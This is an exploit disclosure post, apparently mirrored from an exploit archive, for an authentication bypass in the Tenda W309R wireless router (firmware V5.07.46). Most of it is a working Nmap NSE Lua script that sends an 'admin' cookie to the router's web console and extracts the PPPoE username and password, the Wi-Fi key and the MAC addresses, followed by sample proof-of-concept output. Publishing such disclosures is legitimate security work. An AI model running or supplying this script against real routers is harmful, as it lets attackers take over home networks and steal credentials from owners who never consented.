扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
--------------------------------------------------- # Exploit Title: Tenda W309R Configuration Enumeration without Authentication # Author: SANTHO <<@s4n7h0>> # Vendor Homepage: http://www.tenda.cn # Product link: http://www.tenda.cn/tendacn/product/show.aspx?productid=382 # Category: Hardware/Wireless Router # Firmware Version : V5.07.46 --------------------------------------------------- Technical Details ~~~~~~~~~~~~~~~~~~ Tenda Wireless Router W309R doesn't have proper authentication for the web application console. Though the application asks for password, it has poor cookie management which allows a user to login even without providing the password. Application uses cookie value "admin" to access the private pages which reveals configuration details such as PPoE username, PPoE password, wireless authentication key, details of MAC addresses etc, in the source code. Exploit Code [written in Nmap Script] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ local nmap = require "nmap" local shortport = require "shortport" local table = require "table" local http = require "http" local stdnse = require 'stdnse' description = [[ Tenda W309R allows an attacker to access the configuration detailed with no authentication. Firmware Tested : V5.07.46 Thanks & Credits : Mahesh Gavkar, Samandeep Singh (@samanLEET), Amit Ghadigaonkar ]] --- --@usage -- nmap host --script http-tenda --script-args user=tenda --80/tcp openhttp --| http-tenda: --| PPPoE Username : home_user --| PPPoE Password : 12345 --| Wireless Password : 12345678 --| Clone MAC : AA:AA:AA:AA:AA:AA --|_Face MAC : BB:BB:BB:BB:BB:BB --- author = "Sanoop Thomas a.k.a @s4n7h0" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"safe","discovery"} portrule = shortport.http function formatme(line) local start = string.find(line, '"') local stop = string.find(line, '";') return line:sub(start+1,stop-1) end function fetchinfo(r) local tenda = {} local param,value for line in r.body:gmatch("[^\r\n]+") do if(line:match("def_PUN = "))then table.insert(tenda,"PPPoE Username : " .. formatme(line)) end if(line:match("def_PPW ="))then table.insert(tenda,"PPPoE Password : " .. formatme(line)) end if(line:match("def_wirelesspassword ="))then table.insert(tenda,"Wireless Password : " .. formatme(line)) end if(line:match("var cln_MAC ="))then table.insert(tenda,"Clone MAC : " .. formatme(line)) end if(line:match("var fac_MAC = "))then table.insert(tenda,"Face MAC : " .. formatme(line)) end end return tenda end action = function(host, port) local user = "admin" local r local config = {} if(nmap.registry.args.user) then user = nmap.registry.args.user end local header = { cookies = user } r = http.get(host,port,'/index.asp',header) return stdnse.format_output(true, fetchinfo(r)) end PoC Output ~~~~~~~~~~~~~ root@bt# nmap 192.168.0.1 -p 80 --script http-tenda-enum Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-28 17:35 Nmap scan report for 192.168.0.1 Host is up (0.0019s latency). PORT STATE SERVICE 80/tcp openhttp | http-tenda-enum: | PPPoE Username : home_user | PPPoE Password : 12345 | Wireless Password : 12345678 | Clone MAC : AA:AA:AA:AA:AA:AA |_Face MAC : C8:3A:35:BB:BB:BB MAC Address: C8:3A:35:BB:BB:BB (Tenda Technology Co.) Nmap done: 1 IP address (1 host up) scanned in 2.30 seconds -- SANTHO twitter : @s4n70 <https://twitter.com/s4n7h0> |
体验盒子
